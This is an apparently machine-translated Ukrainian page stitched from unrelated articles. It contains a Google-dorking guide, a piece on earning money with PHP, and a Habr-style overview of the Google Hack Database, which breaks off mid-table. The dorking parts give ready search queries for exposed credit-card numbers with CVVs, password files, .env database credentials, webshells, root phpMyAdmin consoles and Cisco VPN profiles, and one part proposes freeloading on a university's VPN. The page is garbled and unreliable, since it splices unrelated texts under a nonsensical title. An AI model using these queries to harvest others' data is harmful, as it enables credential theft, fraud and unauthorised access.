Inurl php http який заробіток. Як заробити на знанні PHP? Як php програмісту добре заробляти вдома

Отримання приватних даних не завжди означає зламування - іноді вони опубліковані в загальному доступі. Знання налаштувань Google та трохи кмітливості дозволять знайти масу цікавого – від номерів кредиток до документів ФБР.

WARNING

Вся інформація надана виключно для ознайомлення. Ні редакція, ні автор не несуть відповідальності за будь-яку можливу шкоду, заподіяну матеріалами цієї статті.

До інтернету сьогодні підключають все поспіль, мало піклуючись про обмеження доступу. Тому багато приватних даних стають видобутком пошукових систем. Роботи-павуки вже не обмежуються веб-сторінками, а індексують весь доступний в Мережі контент і постійно додають у свої бази не призначену для розголошення інформацію. Дізнатися про ці секрети просто - потрібно лише знати, як саме запитати про них.

Шукаємо файли

В умілих руках Google швидко знайде все, що погано лежить в Мережі, наприклад, особисту інформацію та файли для службового використання. Їх часто ховають, як ключ під половиком: реальних обмежень доступу немає, дані просто лежать на задвірках сайту, куди не ведуть посилання. Стандартний веб-інтерфейс Google надає лише базові налаштування розширеного пошуку, але навіть їх буде достатньо.

Обмежити пошук файлів певного виду в Google можна за допомогою двох операторів: filetype і ext. Перший задає формат, який пошуковик визначив за заголовком файлу, другий - розширення файлу, незалежно від його внутрішнього вмісту. При пошуку в обох випадках слід зазначати лише розширення. Спочатку оператор ext було зручно використовувати в тих випадках, коли специфічні ознаки формату файлу були відсутні (наприклад, для пошуку конфігураційних файлів ini і cfg, всередині яких може бути все що завгодно). Зараз алгоритми Google змінилися, і видимої різниці між операторами немає – результати здебільшого виходять однакові.


Фільтруємо видачу

За промовчанням слова і будь-які введені символи Google шукає по всіх файлах на проіндексованих сторінках. Обмежити область пошуку можна за доменом верхнього рівня, конкретним сайтом або за місцем розташування шуканої послідовності в самих файлах. Для перших двох варіантів використовується оператор site, після якого вводиться ім'я домену або вибраного сайту. У третьому випадку цілий набір операторів дозволяє шукати інформацію у службових полях та метаданих. Наприклад, allinurl знайде задане в тілі самих посилань, allinanchor - у тексті, з тегом , allintitle - у заголовках сторінок, allintext - у тілі сторінок.

Для кожного оператора є полегшена версія з коротшою назвою (без приставки all). Різниця в тому, що allinurl знайде посилання з усіма словами, а inurl - тільки з першим з них. Друге та наступні слова із запиту можуть зустрічатися на веб-сторінках будь-де. Оператор inurl теж має відмінності від іншого схожого за змістом - site. Перший також дозволяє знаходити будь-яку послідовність символів у посиланні на потрібний документ (наприклад, /cgi-bin/), що широко використовується для пошуку компонентів з відомими вразливістю.

Спробуємо практично. Беремо фільтр allintext і робимо так, щоб запит видав список номерів та перевірочних кодів кредиток, термін дії яких закінчиться лише через два роки (або коли їх власникам набридне годувати всіх поспіль).

Allintext: card number expiration date /2017 cvv

Коли читаєш у новинах, що юний хакер «зламав сервери» Пентагону або NASA, вкравши секретні відомості, то здебільшого йдеться саме про таку елементарну техніку використання Google. Припустимо, нас цікавить список співробітників NASA та їх контактні дані. Напевно, такий перелік є в електронному вигляді. Для зручності або недогляду він може лежати і на самому сайті організації. Логічно, що в цьому випадку на нього не буде посилань, оскільки він призначений для внутрішнього використання. Які слова можуть бути у такому файлі? Як мінімум – поле «адреса». Перевірити всі ці припущення найпростіше.


Inurl:nasa.gov filetype:xlsx "address"


Користуємося бюрократією

Подібні знахідки – приємна дрібниця. По-справжньому ж солідний улов забезпечує більш детальне знання операторів Google для веб-майстрів, самої Мережі та особливостей шуканої структури. Знаючи деталі, можна легко відфільтрувати видачу та уточнити властивості потрібних файлів, щоб у залишку отримати справді цінні дані. Смішно, що тут на допомогу приходить бюрократія. Вона плодить типові формулювання, за якими зручно шукати секретні відомості, що випадково просочилися в Мережу.

Наприклад, обов'язковий у канцелярії міністерства оборони США штамп Distribution statement означає стандартизовані обмеження поширення документа. Літерою A відзначаються громадські релізи, у яких немає нічого секретного; B - призначені лише внутрішнього використання, C - суворо конфіденційні тощо до F. Окремо стоїть літера X, якої відзначені особливо цінні відомості, що становлять державну таємницю вищого рівня. Нехай такі документи шукають ті, кому це належить робити за обов'язком служби, а ми обмежимося файлами з літерою С. Згідно з директивою DoDI 5230.24, таке маркування присвоюється документам, що містять опис критично важливих технологій, які потрапляють під експортний контроль. Виявити таку ретельно охоронювану інформацію можна на сайтах у домені верхнього рівня.mil, виділеного для армії США.

"DISTRIBUTION STATEMENT C" inurl:navy.mil

Дуже зручно, що в домене.mil зібрані лише сайти з відомства МО США та його контрактних організацій. Пошукова видача з обмеженням по домену виходить виключно чистою, а заголовки - самі за себе. Шукати подібним чином російські секрети практично марно: в домене.


Уважно вивчивши будь-який документ із сайту в домене.mil, можна побачити інші маркери для уточнення пошуку. Наприклад, посилання на експортні обмеження «Sec 2751», за яким також зручно шукати цікаву технічну інформацію. Іноді її вилучають з офіційних сайтів, де вона одного разу засвітилася, тому, якщо в пошуковій видачі не вдається перейти за цікавим посиланням, скористайся кешем Гугла (оператор cache) або сайтом Internet Archive.

Забираємось у хмари

Окрім випадково розсекречених документів урядових відомств, у кеші Гугла часом спливають посилання на особисті файли з Dropbox та інших сервісів зберігання даних, які створюють «приватні» посилання на публічно опубліковані дані. З альтернативними та саморобними сервісами ще гірше. Наприклад, наступний запит знаходить дані всіх клієнтів Verizon, у яких на роутері встановлено та активно використовується FTP-сервер.

Allinurl:ftp://verizon.net

Таких розумників зараз знайшлося понад сорок тисяч, а навесні 2015-го їх було значно більше. Замість Verizon.net можна підставити ім'я будь-якого відомого провайдера, і чим він буде відомішим, тим більшим може бути улов. Через вбудований FTP-сервер видно файли на підключеному до маршрутизатора зовнішньому накопичувачі. Зазвичай це NAS для віддаленої роботи, персональна хмара або якась пірінгова гойдалка файлів. Весь вміст таких носіїв виявляється проіндексованим Google та іншими пошуковими системами, тому отримати доступ до файлів, що зберігаються на зовнішніх дисках, можна за прямим посиланням.

Підглядаємо конфіги

До повальної міграції до хмар як віддалених сховищ керували прості FTP-сервери, в яких теж вистачало вразливостей. Багато хто з них актуальний досі. Наприклад, у популярній програмі WS_FTP Professional дані про конфігурацію, облікові записи користувача та паролі зберігаються у файлі ws_ftp.ini . Його просто знайти та прочитати, оскільки всі записи зберігаються у текстовому форматі, а паролі шифруються алгоритмом Triple DES після мінімальної обфускації. Більшість версій досить просто відкинути перший байт.

Розшифрувати такі паролі легко за допомогою утиліти WS_FTP Password Decryptor або безкоштовного веб-сервісу.

Говорячи про зло довільного сайту, зазвичай мають на увазі отримання пароля з логів та бекапів конфігураційних файлів CMS або додатків для електронної комерції. Якщо знаєш їхню типову структуру, то легко зможеш вказати ключові слова. Рядки, подібні до ws_ftp.ini , вкрай поширені. Наприклад, Drupal і PrestaShop обов'язково є ідентифікатор користувача (UID) і відповідний йому пароль (pwd), а зберігається вся інформація у файлах з розширенням.inc. Шукати їх можна так:

"pwd=" "UID=" ext:inc

Розкриваємо паролі від СУБД

У конфігураційних файлах SQL-серверів імена та адреси електронної пошти користувачів зберігаються у відкритому вигляді, а замість паролів записані їхні хеші MD5. Розшифрувати їх, строго кажучи, неможливо, проте можна знайти відповідність серед відомих пар хеш-пароль.

Досі зустрічаються СУБД, у яких не використовується навіть хешування паролів. Конфігураційні файли будь-якої з них можна просто переглянути в браузері.

Intext:DB_PASSWORD filetype:env

З появою на серверах Windows місце файлів конфігурації частково зайняв реєстр. Шукати по його гілках можна таким же чином, використовуючи reg як тип файлу. Наприклад, ось так:

Filetype:reg HKEY_CURRENT_USER "Password"=

Не забуваємо про очевидне

Іноді дістатися до закритої інформації вдається за допомогою випадково відкритих даних, що потрапили в поле зору Google. Ідеальний варіант - знайти список паролів у якомусь поширеному форматі. Зберігати відомості облікових записів у текстовому файлі, документі Word або електронній таблиці Excel можуть лише відчайдушні люди, але їх завжди вистачає.

Filetype:xls inurl:password

З одного боку, є маса коштів для запобігання подібним інцидентам. Необхідно вказувати адекватні права доступу до htaccess, патчити CMS, не використовувати ліві скрипти та закривати інші дірки. Існує також файл зі списком винятків robots.txt, що забороняє пошуковикам індексувати зазначені в ньому файли та каталоги. З іншого боку, якщо структура robots.txt на якомусь сервері відрізняється від стандартної, відразу стає видно, що на ньому намагаються приховати.

Список каталогів та файлів на будь-якому сайті випереджається стандартним написом index of. Оскільки для службових цілей вона повинна зустрічатися в заголовку, то є сенс обмежити її пошук оператором intitle . Цікаві речі знаходяться в каталогах /admin/, /personal/, /etc/ і навіть /secret/.

Слідкуємо за оновленнями

Актуальність тут дуже важлива: старі вразливості закривають дуже повільно, але Google та його пошукова видача змінюються постійно. Є різниця навіть між фільтром «за останню секунду» (&tbs=qdr:s наприкінці урла запиту) та «в реальному часі» (&tbs=qdr:1).

Часовий інтервал дати останнього оновлення файлу у Google також вказується неявно. Через графічний веб-інтерфейс можна вибрати один із типових періодів (годину, день, тиждень і так далі) або задати діапазон дат, але такий спосіб не підходить для автоматизації.

За видом адресного рядка можна здогадатися лише про спосіб обмежити виведення результатів за допомогою конструкції &tbs=qdr: . Літера y після неї ставить ліміт в один рік (&tbs=qdr:y), m показує результати за останній місяць, w - за тиждень, d - за минулий день, h - за останню годину, n - за хвилину, а s - за секунду. Найсвіжіші результати, які щойно стали відомими Google, знаходиться за допомогою фільтра &tbs=qdr:1 .

Якщо потрібно написати хитрий скрипт, буде корисно знати, що діапазон дат задається в Google в юліанському форматі через оператор daterange. Наприклад, ось так можна знайти список PDF-файлів зі словом confidential, завантажених з 1 січня по 1 липня 2015 року.

Confidential filetype:pdf daterange:2457024-2457205

Діапазон вказується у форматі юліанських дат без урахування дрібної частини. Перекладати їх вручну з григоріанського календаря незручно. Простіше скористатися конвертером дат.

Таргетуємось і знову фільтруємо

Крім вказівки додаткових операторів, у пошуковому запиті їх можна надсилати прямо в тілі посилання. Наприклад, уточненню filetype:pdf відповідає конструкція as_filetype=pdf. Таким чином зручно задавати будь-які уточнення. Допустимо, видача результатів тільки з Республіки Гондурас задається додаванням до пошукової URL конструкції cr=countryHN , а тільки з міста Бобруйск - gcs=Bobruisk . У розділі розробників можна знайти повний список .

Засоби автоматизації Google мають полегшити життя, але часто додають проблем. Наприклад, IP користувача через WHOIS визначається його місто. На підставі цієї інформації в Google не тільки балансується навантаження між серверами, а й змінюються результати пошукової видачі. Залежно від регіону при тому самому запиті на першу сторінку потраплять різні результати, а частина з них може виявитися прихованою. Відчути себе космополітом та шукати інформацію з будь-якої країни допоможе її дволітерний код після директиви gl=country. Наприклад, код Нідерландів - NL, а Ватикану та Північній Кореї в Google свій код не покладено.

Часто пошукова видача виявляється засміченою навіть після використання кількох просунутих фільтрів. У такому разі легко уточнити запит, додавши до нього кілька слів-виключень (перед кожним з них ставиться мінус). Наприклад, зі словом Personal часто використовуються banking, names і tutorial. Тому чистіші пошукові результати покаже не хрестоматійний приклад запиту, а уточнений:

Intitle:"Index of /Personal/" -names -tutorial -banking

Приклад наостанок

Досвідчений хакер відрізняється тим, що забезпечує себе всім необхідним самостійно. Наприклад, VPN - штука зручна, але дорога, або тимчасова і з обмеженнями. Оформляти передплату для себе одного дуже невигідно. Добре, що є групові підписки, а за допомогою Google легко стати частиною якоїсь групи. Для цього достатньо визначити файл конфігурації Cisco VPN, у якого досить нестандартне розширення PCF і відомий шлях: Program Files Cisco Systems VPN Client Profiles. Один запит, і ти вливаєшся, наприклад, у дружній колектив Боннського університету.

Filetype:pcf vpn OR Group

INFO

Google знаходить конфігураційні файли з паролями, але багато з них записані в зашифрованому вигляді або замінені хешами. Якщо бачиш рядки фіксованої довжини, то одразу шукай сервіс розшифровки.

Паролі зберігаються в зашифрованому вигляді, але Моріс Массар вже написав програму для їх розшифровки і надає її безкоштовно через thecampusgeeks.com.

За допомогою Google виконуються сотні різних типів атак та тестів на проникнення. Є безліч варіантів, що стосуються популярних програм, основні формати баз даних, численні вразливості PHP, хмар і так далі. Якщо точно уявляти те, що шукаєш, це спростить отримання потрібної інформації (особливо тієї, яку не планували робити загальним надбанням). Не єдиний Shodan живить цікавими ідеями, але будь-яка база проіндексованих мережевих ресурсів!

Від автора:Привіт друзі! У цій статті ми з вами поговоримо про мову програмування PHP. Дізнаємося, навіщо він застосовується, що з його допомогою можна робити, і яке місце він посідає на етапах розробки сайтів. Також у цій статті ми розглянемо багато способів, як заробити, вміючи програмувати на PHP.

Що таке PHP і для чого він потрібен?

PHP - це скриптова мова, яка дуже активно застосовується при розробці веб-застосунків. PHP є однією з лідируючих мов, які застосовуються у розробці динамічних веб-сайтів.

PHP – це серверна мова програмування. Усі скрипти, написані цією мовою, виконуються на сервері із сайтом. Для вивчення PHP, розробки та налагодження сайтів та скриптів реальний сервер в інтернеті, звичайно, можна не купувати. Для цього використовуються емулятори сервера, які у вигляді програм просто встановлюються на робочий комп'ютер. А на сервері в інтернеті (хостингу) розміщують вже готові сайти та сторінки з PHP скриптами. До речі, майже всі сучасні хостинги підтримують мову PHP.

Популярність цієї мови в області створення веб-сайтів визначається наявністю великого набору вбудованих засобів для розробки веб-додатків. Основні з них:

автоматичне вилучення POST та GET-параметрів, а також змінних оточення веб-сервера у визначені масиви;

взаємодія з великою кількістю різних систем управління базами даних (MySQL, MySQLi, SQLite, PostgreSQL, Oracle (OCI8), Oracle, Microsoft SQL Server, Sybase, ODBC, mSQL, IBM DB2, Cloudscape та Apache Derby, Informix, Ovrimos SQL, Lotus Notes , DB++, DBM, dBase, DBX, FrontBase, FilePro, Ingres II, SESAM, Firebird / InterBase, Paradox File Access, MaxDB, PDO інтерфейс);

автоматизоване відправлення HTTP-заголовків;

робота з cookies та сесіями;

робота з локальними та віддаленими файлами, сокетами;

обробка файлів, що завантажуються на сервер;

робота з XForms.

Давайте розглянемо приклад, де на сторінці працює скрипт PHP. Візьмемо, наприклад, форму передплати, в яку ви вписуєте своє ім'я та email на багатьох сайтах. За зовнішній вигляд форми – кольори полів введення та кнопки, зміна кольору кнопки з наведення та натискання на неї і так далі – відповідає HTML та CSS. За допомогою HTML5 можна зробити перевірку правильності даних, введених у форму, наприклад, чи правильно заповнені поля email або телефону.

А після того, як ви натиснули кнопку «Підписатися», викликається PHP скрипт, який отримує введені вами у форму дані. Скрипт записує їх у базу даних, генерує та надсилає вам на пошту, зазначену у формі, посилання для підтвердження підписки, перевіряє підтвердження підписки та надсилає вам наступні листи. Всі ці операції виконуються на сервері, і робиться це за допомогою мови програмування PHP.

Застосування PHP у розробці сайтів

Щоб створити сайт, потрібно послідовно пройти декілька етапів:

Планування. На цьому етапі ми плануємо майбутній сайт: для кого і для чого ми його робимо, хто відвідуватиме сайт, чим його наповнюватиме, що має бути на сайті і так далі.

Дизайн. На етапі дизайну ми створюємо у графічному редакторі зовнішній вигляд сторінок сайту.

Верстка. На етапі верстки ми, використовуючи HTML та CSS, верстаємо з макетів, отриманих на етапі дизайну HTML-сторінки майбутнього сайту.

Програмування. На етапі програмування автоматизуємо процеси роботи із сайтом. Програмуємо адміністраторську частину сайту (адмінку), щоб можна було додавати, видаляти, редагувати існуючі сторінки навіть людині, яка зовсім не знайома з сайтобудуванням. Програмуємо, щоб працював пошук та всі форми підписки (якщо вони є) на сайті. Робимо так, щоб новостворена сторінка відображалася на сайті, і в меню автоматично з'являлося посилання на створену сторінку. Якщо на сайті використовуються голосування або опитування, то це також все програмується на PHP, на етапі програмування.

Якщо розглянути етап програмування більш масштабного сайту, наприклад, інтернет-магазину, то тут все ще ширше і цікавіше. У такому разі ми додаємо не лише сторінки, а ще й товари – основний контент інтернет-магазину. Причому в адмінці потрібно передбачити розбивку товарів, що додаються, за різними категоріями. Також має бути можливість редагувати товар, змінювати його опис, ціну, картинку тощо.

Крім цього, для інтернет-магазину потрібне програмування системи аналітики - щоб можна було дивитися в адмінці, скільки було оформлено та оплачено замовлень, на яку суму, та які товари були оплачені з яких категорій, тощо. Причому має бути можливість виводити подібні зведення за різні періоди. При програмуванні інтернет-магазину часто також реалізується формування звітності з продажу бухгалтерського обліку та податкової.

Ось чому етап, на якому використовується мова програмування PHP, найважливіший, найтриваліший за часом і найдорожчий і найоплачуваніший у розробці сайту. А розібравшись із програмуванням інтернет-магазину, ви зможете створити скрипти на сайт практично будь-якої складності.

Популярність PHP

Про популярність PHP говорить той факт, що він використовується на 83,1% серед усіх сайтів, на яких вдалося визначити мову програмування серверної частини.

Всі найпопулярніші CMS, які посідають перші місця в рейтингах популярності (як платні, так і безкоштовні: WordPress, Joomla, Drupal, Modx, Bitrix. Magento та ін.) – написані мовою програмування PHP.

Також про популярність мови програмування PHP свідчить безліч створених PHP-фреймворків, таких як Laravel, Yii, CakePHP, Slim, Zend Framework 2, PHPixie, CodeIgniter, Symfony 2 та інші. Існує величезна кількість форумів та великих спільнот - загалом по PHP, по кожному фреймворку та по кожній CMS окремо.
Ще додам, що найбільші світові сайти, наприклад Facebook, Wikipedia - також написані на PHP.

Як, маючи знання з PHP, можна заробити?

З огляду на популярність PHP є постійний високий попит на PHP-програмістів. Маючи знання з PHP та вміючи програмувати цією мовою, ви відкриєте нові можливості для заробітку. Давайте розглянемо основні з них, за допомогою яких сьогодні справді можна заробляти:

Заробіток на розробці скриптів. Всі сайти постійно розвиваються, і для них періодично потрібно написання нових скриптів, або розробка додаткового функціоналу, модулів та ін. За подібними розробками власники сайтів звертаються до PHP-розробників. Причому в даному випадку можна заробляти двома способами:

відстежувати замовлення про пошук розробника на фрілансі;

генерувати ідеї для масових скриптів. Маючи ідею скрипта, який точно буде затребуваний серед, наприклад, власників інтернет-магазинів, ви зможете самостійно розробити такий скрипт та продавати його власникам інтернет-магазинів;

Доробка готових скриптів на замовлення. Тут все просто - беретеся за доопрацювання або виправлення будь-якого скрипту. Але в даному випадку є нюанс - спочатку скрипт може бути зроблений не дуже якісно, ​​і на його доопрацювання може піти більше часу, ніж на написання скрипта «з нуля». Тому, якщо використовуватимете такий спосіб заробітку, дивіться спочатку дуже уважно на те, що ви доопрацьовуватимете і дороблятимете.

Розробка плагінів для CMS. У цьому способі все те саме, як і при заробітку на скриптах. Часто для сайтів, створених на готових CMS, потрібно написання будь-якого плагіна, доповнення чи розширення. І заробляти тут також можна двома способами:

відстежувати замовлення з розробки плагінів, доповнень та розширень на фрілансі;

розробити та продавати масовий плагін, який точно буде затребуваний на більшості сайтів;

Свої та спільні проекти. Якщо у вас є ідея для проекту в інтернеті (стартапа), наприклад, ідея корисного сервісу або програми, яка вирішувала б певну проблему, то ви можете її почати реалізовувати. На початковому етапі це може бути просто навіть як хобі, крім основної роботи. Потім, коли видно, що хобі виростає у великий проект, можна буде приділяти йому більше часу.

Створення динамічних сайтів та двигунів під них. Також можна добре заробляти, розробляючи сайти на замовлення, працюючи на фрілансі або у веб-студії.

Створення сайтів для себе. Ви можете створити сайт для себе, наповнити його корисним контентом - а коли на сайті буде достатньо відвідувачів, почати заробляти, розміщуючи на ньому платну рекламу або просуваючи чиїсь продукти за партнерськими програмами.

Думаю, багато хто з вас відвідала думку про те, що всі перераховані вище методи заробітку можна комбінувати. І це вірно! Ви можете створити сайт для себе та пасивно заробляти на продажу реклами з нього, плюс до цього створити скрипт або плагін і продавати його на спеціалізованих майданчиках, заробляючи на автопілоті з кожного продажу, і при цьому ще можете працювати у веб-студії. Чому ні? Звичайно можна!

Скільки PHP-розробник може заробляти?

Із заробітком PHP-програмістів все індивідуально. Тут багато залежить від того, де працювати, як працювати, який рівень знань, який досвід, кваліфікація, які суміжні додаткові знання має розробник і так далі. Тому жодної точної цифри тут, в принципі, бути не може. Але ми можемо подивитися, яку зарплату пропонують під час пошуку PHP-програмістів у веб-студії, і скільки готові платити за проект на біржах фрілансу.

На зображенні нижче показано пропоновану оплату праці для PHP-програмістів у веб-студії. Причому це оплати праці PHP-програмістам без досвіду роботи:

Якщо є досвід роботи, то можна заробляти набагато більше. Нижче наведені зарплати, пропоновані PHP-програмістам з досвідом роботи.

І на фрілансі сьогодні теж можна пристойно заробляти:

Висновок

PHP – найпопулярніша мова програмування серед веб-розробників. Абсолютна більшість усіх сайтів в інтернеті написана на PHP. Маючи знання та вміючи розробляти цією мовою програмування, можна заробляти хороші гроші, причому є безліч варіантів для заробітку - від роботи в веб-студії до розробки власного проекту, стартапу.

Будь-який пошук уразливостей на веб-ресурсах починається з розвідки та збору інформації.
Розвідка може бути як активною – брутфорс файлів та директорій сайту, запуск сканерів уразливостей, ручний перегляд сайту, так і пасивною – пошук інформації у різних пошукових системах. Іноді буває так, що вразливість стає відомою ще до відкриття першої сторінки сайту.

Як таке можливо?
Пошукові роботи, які безперервно блукають просторами інтернету, крім інформації, корисної звичайному користувачеві, часто фіксують те, що може бути використане зловмисниками при атаці на веб-ресурс. Наприклад, помилки скриптів та файли з чутливою інформацією (починаючи від конфігураційних файлів та логів, закінчуючи файлами з автентифікаційними даними та бекапами баз даних).
З погляду пошукового робота повідомлення про помилку виконання SQL-запиту - це звичайний текст, невіддільний, наприклад, від опису товарів на сторінці. Якщо раптом пошуковий робот наткнувся на файл з розширенням.sql, який чомусь опинився в робочій папці сайту, то він буде сприйнятий як частина вмісту сайту і так само буде проіндексовано (включаючи, можливо, вказані паролі).

Подібну інформацію можна знайти, знаючи стійкі, часто унікальні ключові слова, які допомагають відокремити «вразливі сторінки» від сторінок, що не містять вразливості.
Величезна база спеціальних запитів із використанням ключових слів (так званих дорків) існує на exploit-db.com і відома під назвою Google Hack Database.

Чому Google?
Дорки орієнтовані в першу чергу на google з двох причин:
− найбільш гнучкий синтаксис ключових слів (наведено в Таблиці 1) та спеціальних символів (наведено в Таблиці 2);
− індекс google все ж таки більш повний ніж у інших пошукових систем;

Таблиця 1 – Основні ключові слова google

Ключове слово
Сенс
приклад
site
Пошук лише на вказаному сайті. Враховує лише url
site:somesite.ru - знайде всі сторінки по даному домену та піддоменам
inurl
Пошук за словами, присутнім у uri. На відміну від кл. слова "site", шукає збіги після імені сайту
inurl:news - знайде всі сторінки, де в uri зустрінеться це слово
intext
Пошук у тілі сторінки
intext:"пробки" - повністю аналогічно звичайному запиту "пробки"
intitle
Пошук у заголовку сторінки. Текст, укладений між тегами <br></td> <td width="214">intitle:"index of" - знайде всі сторінки з лістингом директорії <br></td> </tr><tr><td width="214">ext <br></td> <td width="214">Пошук сторінок із зазначеним розширенням <br></td> <td width="214">ext:pdf - знайде всі PDF-файли <br></td> </tr><tr><td width="214">filetype <br></td> <td width="214">В даний час повністю аналогічно кл. слову “ext” <br></td> <td width="214">filetype:pdf - аналогічно <br></td> </tr><tr><td width="214">related <br></td> <td width="214">Пошук сайтів зі схожою тематикою <br></td> <td width="214">related:google.ru - покаже свої аналоги <br></td> </tr><tr><td width="214">link <br></td> <td width="214">Пошук сайтів, що посилаються на даний <br></td> <td width="214">link:somesite.ru - знайде всі сайти, на яких є посилання на даний <br></td> </tr><tr><td width="214">define <br></td> <td width="214">Показати визначення слова <br></td> <td width="214">define:0day - визначення терміна <br></td> </tr><tr><td width="214">cache <br></td> <td width="214">Показати вміст сторінки в кеші (якщо є) <br></td> <td width="214">cache:google.com - відкриє сторінку з кешу <br></td> </tr></tbody></table><p>Таблиця 2 – Спеціальні символи запитів google <br></p><table><tbody><tr><td width="214"><b>Символ</b><br></td> <td width="214"><b>Сенс</b><br></td> <td width="214"><b>приклад</b><br></td> </tr><tr><td width="214">“<br></td> <td width="214">Точна фраза <br></td> <td width="214">intitle:«RouterOS router configuration page» - пошук роутерів <br></td> </tr><tr><td width="214">*<br></td> <td width="214">Будь-який текст <br></td> <td width="214">inurl:«bitrix*mcart» - пошук сайтів на bitrix з вразливим модулем mcart <br></td> </tr><tr><td width="214">.<br></td> <td width="214">Будь-який символ <br></td> <td width="214">Index.of - аналогічно до запиту index of <br></td> </tr><tr><td width="214">-<br></td> <td width="214">Виключити слово <br></td> <td width="214">error -warning - показати всі сторінки, де є error, але немає warning <br></td> </tr><tr><td width="214">..<br></td> <td width="214">Діапазон <br></td> <td width="214">cve 2006..2016 - показати вразливості за роками починаючи з 2006 <br></td> </tr><tr><td width="214">|<br></td> <td width="214">Логічне «або» <br></td> <td width="214">linux | windows - показати сторінки, де зустрічається або перше або друге слово <br></td> </tr></tbody></table><br>Варто розуміти, що будь-який запит до пошукової системи – це пошук лише за словами. <br>Марно шукати на сторінці мета-символи (лапки, дужки, знаки пунктуації тощо). Навіть пошук за точною фразою, вказаною в лапках, - це пошук за словами, з подальшим пошуком точного збігу вже в результатах. <p>Усі доріжки Google Hack Database розділені логічно на 14 категорій і представлені в таблиці 3. <br>Таблиця 3 – Категорії Google Hack Database <br></p><table><tbody><tr><td width="168"><b>Категорія</b><br></td> <td width="190"><b>Що дозволяє знайти</b><br></td> <td width="284"><b>приклад</b><br></td> </tr><tr><td width="168">Footholds <br></td> <td width="190">Веб-шелли, публічні файлові менеджери <br></td> <td width="284">Знайти всі зламані сайти, де залиті перераховані вебшели: <br>(intitle:«phpshell» OR intitle:«c99shell» OR intitle:«r57shell» OR intitle:«PHP Shell » OR intitle:«phpRemoteView») `rwx` «uname» <br></td> </tr><tr><td width="168">Files containing usernames <br></td> <td width="190">Файли реєстру, файли конфігурації, логи, файли, що містять історію введених команд <br></td> <td width="284">Знайти всі файли реєстру, які містять інформацію про облікові записи: <br><i>filetype:reg reg +intext:«Internet account manager»</i><br></td> </tr><tr><td width="168">Sensitive Directories <br></td> <td width="190">Каталоги з різною інформацією (особисті документи, конфіги vpn, приховані репозиторії та ін.) <br></td> <td width="284">Знайти всі лістинги директорій, що містять файли, що відносяться до vpn: <br><i>"Config" intitle:"Index of" intext:vpn</i><br>Сайти, що містять git-репозиторії: <br><i>(intext: "index of /.git") ("parent directory")</i><br></td> </tr><tr><td width="168">Web Server Detection <br></td> <td width="190">Версію та іншу інформацію про веб-сервер <br></td> <td width="284">Знайти адміністративні консолі сервера JBoss: <br><i>inurl:"/web-console/" intitle:«Administration Console»</i><br></td> </tr><tr><td width="168">Vulnerable Files <br></td> <td width="190">Скрипти, що містять відомі вразливості <br></td> <td width="284">Знайти сайти, які використовують скрипт, що дозволяє вивантажити довільний файл із сервера: <br><i>allinurl:forcedownload.php?file=</i><br></td> </tr><tr><td width="168">Vulnerable Servers <br></td> <td width="190">Інсталяційні скрипти, веб-шелли, відкриті адміністративні консолі та ін. <br></td> <td width="284">Знайти відкриті PHPMyAdmin консолі, запущені від root: <br><i>intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"</i><br></td> </tr><tr><td width="168">Error Messages <br></td> <td width="190">Різні помилки та попередження, що часто розкривають важливу інформацію - починаючи від версії CMS до паролів <br></td> <td width="284">Сайти, що мають помилки у виконанні SQL-запитів до бази: <br><i>"Warning: mysql_query()" "invalid query"</i><br></td> </tr><tr><td width="168">Files containing juicy info <br></td> <td width="190">Сертифікати, бекапи, електронні листи, логи, SQL-скрипти і т.д. <br></td> <td width="284">Знайти ініціалізаційні sql-скрипти: <br><i>filetype:sql та «insert into» -site:github.com</i><br></td> </tr><tr><td width="168">Files containing passwords <br></td> <td width="190">Все, що може містити паролі - логи, sql-скрипти і т.д. <br></td> <td width="284">Логи, що згадують паролі: <br><i>filetype:</i><i>log</i><i>intext:</i><i>password |</i><i>pass |</i><i>pw</i><br>sql-скрипти, що містять паролі: <br><i>ext:</i><i>sql</i><i>intext:</i><i>username</i><i>intext:</i><i>password</i><br></td> </tr><tr><td width="168">Sensitive Online Shopping Info <br></td> <td width="190">Інформація пов'язана з онлайн покупками <br></td> <td width="284">Знайти пінкоди: <br><i>dcid=</i><i>bn=</i><i>pin</i><i>code=</i><br></td> </tr><tr><td width="168">Network or vulnerability data <br></td> <td width="190">Інформацію, що не відноситься безпосередньо до веб-ресурсу, але що стосується мережі або інші не веб-сервіси <br></td> <td width="284">Знайти скрипти автоматичного налаштування проксі, що містять інформацію про внутрішню мережу: <br><i>inurl:прокси | inurl:wpad ext:pac | ext:dat findproxyforurl</i><br></td> </tr><tr><td width="168">Pages containing login portals <br></td> <td width="190">Сторінки, що містять форми входу <br></td> <td width="284">Веб-сторінки saplogon: <br><i>intext:«2016 SAP AG. All rights reserved.» intitle:«Logon»</i><br></td> </tr><tr><td width="168">Various Online Devices <br></td> <td width="190">Принтери, роутери, системи моніторингу та ін. <br></td> <td width="284">Знайти конфігураційну панель принтера: <br><i>intitle:"</i><i>hp</i><i>laserjet"</i><i>inurl:</i><i>SSI/</i><i>Auth/</i><i>set_</i><i>config_</i><i>deviceinfo.</i><i>htm</i><br></td> </tr><tr><td width="168">Advisories and Vulnerabilities <br></td> <td width="190">Сайти на вразливих версіях CMS <br></td> <td width="284">Знайти вразливі плагіни, через які можна завантажити довільний файл на сервер: <br><i>inurl:fckeditor -intext:«ConfigIsEnabled = False» intext:ConfigIsEnabled</i><br></td> </tr></tbody></table><br>Дорки найчастіше орієнтовані на пошук по всіх сайтах мережі інтернет. Але ні що не заважає обмежити область пошуку на будь-якому веб-сайті або веб-сайтах. <br>Кожен запит до Google можна зосередити на певному сайті, додавши до запиту ключове слово "site:somesite.com". Дане ключове слово може бути дописане до будь-якого дорку. <p><b>Автоматизація пошуку вразливостей</b><br>Так народилася ідея написати просту утиліту, що автоматизує пошук вразливостей за допомогою пошукової системи (google) і спирається на Google Hack Database.</p><p>Утиліта являє собою скрипт, написаний на nodejs з використанням phantomjs. Якщо бути точним, то скрипт інтерпретується самим фантомом. <br>Phantomjs - це повноцінний веб-браузер без графічного інтерфейсу, що керується за допомогою js-коду і володіє зручним API. <br>Утиліта отримала цілком зрозумілу назву – dorks. Запустивши її в командному рядку (без опцій) отримуємо коротку довідку з кількома прикладами використання: <br><br><img src='https://i0.wp.com/habrastorage.org/getpro/habr/post_images/edd/6fb/ccc/edd6fbccc5ec340abe750f3073c1b427.jpg' width="100%" loading=lazy loading=lazy><br>Малюнок 1 - Список основних опцій dorks</p><p>Загальний синтаксис утиліти: dork команда список опцій. <br>Детальний опис усіх опцій наведено в таблиці 4.</p><p>Таблиця 4 – 